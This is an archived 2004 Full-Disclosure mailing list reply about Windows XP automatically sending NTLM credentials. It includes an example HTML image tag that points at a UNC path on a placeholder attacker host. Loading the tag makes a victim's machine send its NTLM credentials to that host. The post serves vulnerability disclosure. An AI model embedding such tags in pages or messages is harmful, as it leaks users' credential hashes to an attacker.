Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP

From: 3APA3A (3APA3A_at_SECURITY.NNOV.RU)
Date: 09/28/04

Next message: Luigi Auriemma: "[Full-Disclosure] Broadcast crash in Chatman 1.5.1 RC1"

Previous message: Dave Horsfall: "Re: [Full-Disclosure] JPEG Virus"
In reply to: Hidenobu Seki: "[Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP"
Next in thread: Barrie Dempster: "Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP"
Reply: Barrie Dempster: "Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: "Hidenobu Seki" <urity_friday@hotmail.com>
Date: Tue, 28 Sep 2004 17:17:51 +0400

Dear Hidenobu Seki,

This problem is known since at least 1997 and still can be exploited
with <IMG SRC="\\w.x.y.z\fakeshare\fakefile"> without any MS Word
document.

--Tuesday, September 28, 2004, 2:20:13 AM, you wrote to full-disclosure@lists.netsys.com:

HS> Hello.

HS> For your information:
HS> Automatically passing NTLM authentication credentials on Windows XP
HS> http://www.securityfriday.com/Topics/winxp3.html

HS> Thank you.

HS> _________________________________________________________________
HS> Add photos to your messages with MSN 8. Get 2 months FREE*.
HS> http://join.msn.com/?page=features/featuredemail

HS> _______________________________________________
HS> Full-Disclosure - We believe in it.
HS> Charter: http://lists.netsys.com/full-disclosure-charter.html

-- 
~/ZARAZA
Особую проблему составляет алкоголизм.  (Лем)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Next message: Luigi Auriemma: "[Full-Disclosure] Broadcast crash in Chatman 1.5.1 RC1"

Previous message: Dave Horsfall: "Re: [Full-Disclosure] JPEG Virus"
In reply to: Hidenobu Seki: "[Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP"
Next in thread: Barrie Dempster: "Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP"
Reply: Barrie Dempster: "Re: [Full-Disclosure] Automatically passing NTLM authentication credentials on Windows XP"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

Re: [Full-disclosure] List of Fuzzers
... int authenticate(char* username, char* password) { ... that fuzzing has its limitations (that can be fixed and applied like ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure)
Re: [Full-disclosure] List of Fuzzers
... valid to use someone else's fuzzing framework against one's own ... I see "Which fuzzer on this list will help me find the most ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure)
Re: [Full-disclosure] List of Fuzzers
... valid to use someone else's fuzzing framework against one's own ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
(Full-Disclosure)
[Full-disclosure] List Charter
... This document serves as a charter for the [Full-Disclosure] mailing ... Typically posting will be ... members may be removed from the list by the management. ...
(Full-Disclosure)
[Full-disclosure] List Charter
... This document serves as a charter for the [Full-Disclosure] mailing ... Typically posting will be ... members may be removed from the list by the management. ...
(Full-Disclosure)